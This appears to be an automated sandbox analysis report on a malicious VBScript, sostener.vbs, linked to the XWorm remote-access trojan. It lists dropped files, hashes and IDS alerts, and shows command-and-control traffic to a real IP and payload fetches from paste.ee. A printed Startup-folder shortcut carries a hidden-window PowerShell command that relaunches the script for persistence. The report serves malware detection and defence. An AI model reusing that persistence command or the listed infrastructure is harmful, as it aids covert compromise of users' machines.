                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozlioxpl.2gx.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzmmshbr.mbw.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzi5hycm.gkg.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtpvmfhw.ajs.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl3v3krf.a0p.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuijkz0k.yqu.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\sostener.vbs

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (604), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):16171698
                                                            Entropy (8bit):3.618016381944346
                                                            Encrypted:false
                                                            SSDEEP:384:ySSSSbSSSSbSSSSbSSSSCSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSCSSB:4
                                                            MD5:B18FCB9A2AF66C700B70CD9F9A58A563
                                                            SHA1:DAE167B9D105E0A29DFB43D83540634819C41F0F
                                                            SHA-256:06EB284366B1E9EF0CB5DDE4F81E8AD974370D6CA1CF6E9969A9721EE5A6DF2D
                                                            SHA-512:6003D459F3B01B5E71BC6CEF265BAA91CB083E5F7B23E3833CC2392538579EC776E5036405E16DA5389CA9DBB955080FBE93C932EEAF231C8C7F19CE05A7974C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:..............'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.'.'.'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'. . .5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..5..5..5..5..5..5..5..5..5..5.. .5..5..

                                                            C:\Users\user\AppData\Local\Temp\sostener.vbs:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2UZKQMWYGED19HY3O59J.temp

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):5458
                                                            Entropy (8bit):3.947967445017931
                                                            Encrypted:false
                                                            SSDEEP:48:dC9P2Zb2BCtJbuOMCnhu7k2Up/lzDSogZo1E2Up/lIDSogZox1:Q9OZb2BCtJMCYY2Up/kHV2Up/lHG
                                                            MD5:63A2A301C472B28E18A688220E837F1B
                                                            SHA1:596573AC1B048A22D29FDB6644A4D53E5C8C95C3
                                                            SHA-256:084C8B38F8B61095A5656652C649CBB0C0686F428E122FC8C2EBD494BEA66EE3
                                                            SHA-512:436B65CD459FB4C6D87160C971A52C547379EF493D61EEA315C9288F16DFB4B56516BF816522C365D0C875B3752E0915A608F61B0C80A2D7E5BA886CF92EB234
                                                            Malicious:false
                                                            Preview:...................................FL..................F. .. ....VM$P...|.C,P....BY$P.............................:..DG..Yr?.D..U..k0.&...&...... M.......(.P....3F,P.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlCY.&....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....CY.&..Roaming.@......DWSlCY.&....C......................n..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlCY.&....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlCY.&....E......................._.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlCY.&....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlCY.&....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1.....CY.&..Startup.h......DWUlCY.&....................>...../h..S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.......2.....CY.& .___WIN~1.LNK.........CY.&CY.&

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\784fc8aa2e762387.customDestinations-ms (copy)

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):5458
                                                            Entropy (8bit):3.947967445017931
                                                            Encrypted:false
                                                            SSDEEP:48:dC9P2Zb2BCtJbuOMCnhu7k2Up/lzDSogZo1E2Up/lIDSogZox1:Q9OZb2BCtJMCYY2Up/kHV2Up/lHG
                                                            MD5:63A2A301C472B28E18A688220E837F1B
                                                            SHA1:596573AC1B048A22D29FDB6644A4D53E5C8C95C3
                                                            SHA-256:084C8B38F8B61095A5656652C649CBB0C0686F428E122FC8C2EBD494BEA66EE3
                                                            SHA-512:436B65CD459FB4C6D87160C971A52C547379EF493D61EEA315C9288F16DFB4B56516BF816522C365D0C875B3752E0915A608F61B0C80A2D7E5BA886CF92EB234
                                                            Malicious:false
                                                            Preview:...................................FL..................F. .. ....VM$P...|.C,P....BY$P.............................:..DG..Yr?.D..U..k0.&...&...... M.......(.P....3F,P.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlCY.&....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....CY.&..Roaming.@......DWSlCY.&....C......................n..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlCY.&....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlCY.&....E......................._.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlCY.&....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlCY.&....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1.....CY.&..Startup.h......DWUlCY.&....................>...../h..S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.......2.....CY.& .___WIN~1.LNK.........CY.&CY.&

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=169, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                            Category:dropped
                                                            Size (bytes):1202
                                                            Entropy (8bit):3.3426522433889003
                                                            Encrypted:false
                                                            SSDEEP:12:8o6m/3BVSXvk44X3ojsqzKtnWNjW+UcCsvXF4rsZcVlQ1D9eiNL4t2YZ/elFlSJm:8a/BHYVKVWA+/CWerCcIb5qy
                                                            MD5:E4EE0F1B172F2CDE33D0B1C7F70C78EB
                                                            SHA1:24DB6C9F3432AEF13308631BC779EA2379A6CF76
                                                            SHA-256:D8FF3118898DE9A87A69C4516D9FFCA157EE8614F054D0CD13636C2DD4C3F50D
                                                            SHA-512:B2740257D577C8F623C70516C1099D51E7DF33D73491F10473CCB8D4A647B3BBCA59F4031C66DFD4E3B97C59D16EA78A1AE77EA1C06AF323681931B95B2497ED
                                                            Malicious:true
                                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e.......Q.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.g.-.W.i.n.d.o.w.S.t.y.l.e. .h.i.d.d.e.n. .-.c.o.m.m.a.n.d. .w.s.c.r.i.p.t...e.x.e. ././.b. ././.n.o.l.o.g.o. .'.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.o.s.t.e.n.e.r...v.b.s.'...I.m.a.g.e.r.e.s...d.l.l

                                                            Static File Info

                                                            General

                                                            File type:Unicode text, UTF-16, little-endian text, with very long lines (604), with CRLF line terminators
                                                            Entropy (8bit):3.618016381944346
                                                            TrID:
                                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                            • MP3 audio (1001/1) 32.22%
                                                            • Lumena CEL bitmap (63/63) 2.03%
                                                            • Corel Photo Paint (41/41) 1.32%
                                                            File name:sostener.vbs
                                                            File size:16'171'698 bytes
                                                            MD5:b18fcb9a2af66c700b70cd9f9a58a563
                                                            SHA1:dae167b9d105e0a29dfb43d83540634819c41f0f
                                                            SHA256:06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d
                                                            SHA512:6003d459f3b01b5e71bc6cef265baa91cb083e5f7b23e3833cc2392538579ec776e5036405e16da5389ca9dbb955080fbe93c932eeaf231c8c7f19ce05a7974c
                                                            SSDEEP:384:ySSSSbSSSSbSSSSbSSSSCSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSCSSB:4
                                                            TLSH:0DF6B434ED6E6447BD3F41EF3A616872C51B9B0612C24C3B292A504F4EBE6017EB1DE9
                                                            File Content Preview:..............'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.'.'.'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-

                                                            File Icon

                                                            Icon Hash:68d69b8f86ab9a86

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-10-03T06:53:10.743341+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549708104.20.4.235443TCP
                                                            2024-10-03T06:53:13.592811+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549710104.20.4.235443TCP
                                                            2024-10-03T06:53:14.450466+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.549711188.114.96.3443TCP
                                                            2024-10-03T06:53:14.599789+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11188.114.96.3443192.168.2.549711TCP
                                                            2024-10-03T06:53:26.855375+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:53:27.229468+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:53:27.281241+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:53:31.500323+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549725104.20.4.235443TCP
                                                            2024-10-03T06:53:32.934662+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:53:32.934662+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:53:34.227323+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549727104.20.4.235443TCP
                                                            2024-10-03T06:53:35.100353+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.549728188.114.96.3443TCP
                                                            2024-10-03T06:53:35.248038+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11188.114.96.3443192.168.2.549728TCP
                                                            2024-10-03T06:53:38.696524+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:53:38.698900+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:53:50.480098+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:53:50.520812+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:01.564440+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:01.589317+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:02.852872+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:02.852872+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:13.168649+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:13.171376+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:18.695335+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:18.699279+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:30.008241+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:30.011608+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:31.785152+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:31.787240+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:32.851069+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:32.851069+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:34.704124+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:34.705701+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:34.979628+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:34.982207+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:42.056654+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:42.058423+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:50.292339+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:50.295484+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:54:57.753720+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:57.765253+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:00.347039+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:00.348865+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:01.063226+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:01.065080+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:01.393882+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:01.395979+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:01.708783+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:01.710572+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:02.020012+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:02.042058+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:02.862710+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:02.862710+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:06.543005+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:06.545750+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:15.805767+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:15.806620+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 3, 2024 06:53:05.484762907 CEST4970480192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:05.489561081 CEST8049704104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:05.489787102 CEST4970480192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:05.490550995 CEST4970480192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:05.495501041 CEST8049704104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:05.942696095 CEST8049704104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:05.944446087 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:05.944485903 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:05.944593906 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:05.951320887 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:05.951333046 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:05.992347002 CEST4970480192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:06.426806927 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:06.426907063 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:06.435905933 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:06.435935020 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:06.436316013 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:06.476672888 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:06.535634041 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:06.579446077 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:07.098395109 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:07.098486900 CEST44349705104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:07.098589897 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:07.104531050 CEST49705443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:07.123219013 CEST49706443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:07.123265982 CEST44349706185.166.143.50192.168.2.5
